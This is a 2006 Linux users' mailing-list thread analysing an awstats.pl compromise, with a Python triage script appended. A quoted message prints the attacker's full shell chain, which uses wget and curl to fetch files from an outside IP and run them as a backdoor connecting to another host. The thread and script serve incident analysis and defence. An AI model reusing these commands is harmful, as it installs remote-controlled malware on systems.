mmm...interesting. if you're still not at ease with it, better not to take the risk, simply remove it and get another or a new one.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Happy Kamote Foundation
Sent: Monday, May 08, 2006 8:54 AM
To: Kelsey Hartigan-Go; Philippine Linux Users' Group (PLUG) Technical Discussion List
Subject: Re: [plug] awstats.pl

hi kelsey

are you sure? better check things out because the ip is up, but i think he's just using a rundown webserver ;)

yes, the links are not reachable. but the ip is. ;)

-happy kamote

On 5/8/06, Kelsey Hartigan-Go <[EMAIL PROTECTED]> wrote:
>
> attack wasn't successful. but me better take a better care for these
> defaults left open. thanks.
>
> _____ Original message _____
> Subject: Re: [plug] awstats.pl
> Author: "Happy Kamote Foundation" <[EMAIL PROTECTED]>
> Date: 08th May 2006 11:42:9
>
>
> Obviously if awstats is properly configured/patched then it will not
> run this process
>
> 6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping
> .txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.10
> 5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105
> .36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http:
> //219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wg
> et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o pin
> g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%
> 00/awstats.w.x.y.z.conf
>
> and using a bit of common sense, you'll know that it had put in
> something on your box which is particularly malicious. Let's try to
> trim this down (since i have lots of time on my hands)
>
> - smells like a spawned sh shell.
>
> wget http://219.84.105.36/ping.txt
> mv ping.txt temp2006
> perl temp2006 220.227.100.4 3303 : (smells like a backdoor)
>
> (oops this was unsuccessful, kiddie tries again using curl)
> cd /tmp/
> curl -o temp2006 http://219.84.105.36/ping.txt
> perl temp2006 220.227.100.4 3303;done;wg
>
> (oops! this was unsuccessful too! 3 is a charm! this time comes
> precompiled *Grin*)
>
>
> wget http://219.84.105.36/ping
> chmod +x ping;
> ./ping 220.227.100.4 3303
>
> and so on and so forth.. ;)
>
> ;)
> _________________________________________________
> Philippine Linux Users' Group (PLUG) Mailing List
> [email protected] (#PLUG @ irc.free.net.ph)
>
> Read the Guidelines: http://linux.org.ph/lists
> Searchable Archives: http://archives.free.net.ph

--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.392 / Virus Database: 268.5.5/333 - Release Date: 5/5/2006
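
The manual trim-down in the quoted message can also be done mechanically when triaging a suspicious child of a web server process. The following is an added example, not part of the original thread: it splits the chained `sh -c` command from the process listing and reports each downloaded file that is later executed. The function name `triage`, the interpreter list and the abridged command string are this example's own assumptions.

```python
import shlex

# Abridged from the process listing quoted in the thread, with the terminal
# line wraps joined; the full line repeats these same steps several times.
PS_CMD = ("echo ;echo b_exp;wget http://219.84.105.36/ping.txt;"
          "mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;"
          "cd /tmp/;curl -o temp2006 http://219.84.105.36/ping.txt;"
          "wget http://219.84.105.36/ping;chmod +x ping;"
          "./ping 220.227.100.4 3303;echo e_exp")

INTERPRETERS = {"perl", "sh", "bash", "python", "php"}  # assumed list


def triage(cmdline):
    """Return every downloaded file that the ';'-chained command later runs."""
    fetched = {}   # local file name -> URL it came from
    findings = []
    for step in cmdline.split(";"):   # naive split: ignores ';' inside quotes
        try:
            argv = shlex.split(step)
        except ValueError:
            continue  # unbalanced quoting: not parseable as one step
        if not argv:
            continue
        tool, args = argv[0], argv[1:]
        urls = [a for a in args if a.startswith(("http://", "https://"))]
        if tool in ("wget", "curl") and urls:
            # "curl -o NAME URL" writes NAME; plain wget keeps the URL basename
            if tool == "curl" and "-o" in args[:-1]:
                name = args[args.index("-o") + 1]
            else:
                name = urls[0].rsplit("/", 1)[-1]
            fetched[name] = urls[0]
        elif tool == "mv" and len(args) == 2 and args[0] in fetched:
            fetched[args[1]] = fetched.pop(args[0])  # follow the rename
        else:
            # run directly (./ping) or handed to an interpreter (perl temp2006)
            if tool in INTERPRETERS and args:
                target, rest = args[0], args[1:]
            else:
                target, rest = tool, args
            if target.startswith("./"):
                target = target[2:]
            if target in fetched:
                findings.append({"ran": target, "from": fetched[target], "args": rest})
    return findings
```

A non-empty result for a process whose parent is the web server is a download-and-execute chain and should be treated as a compromise indicator until the fetched files are accounted for.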

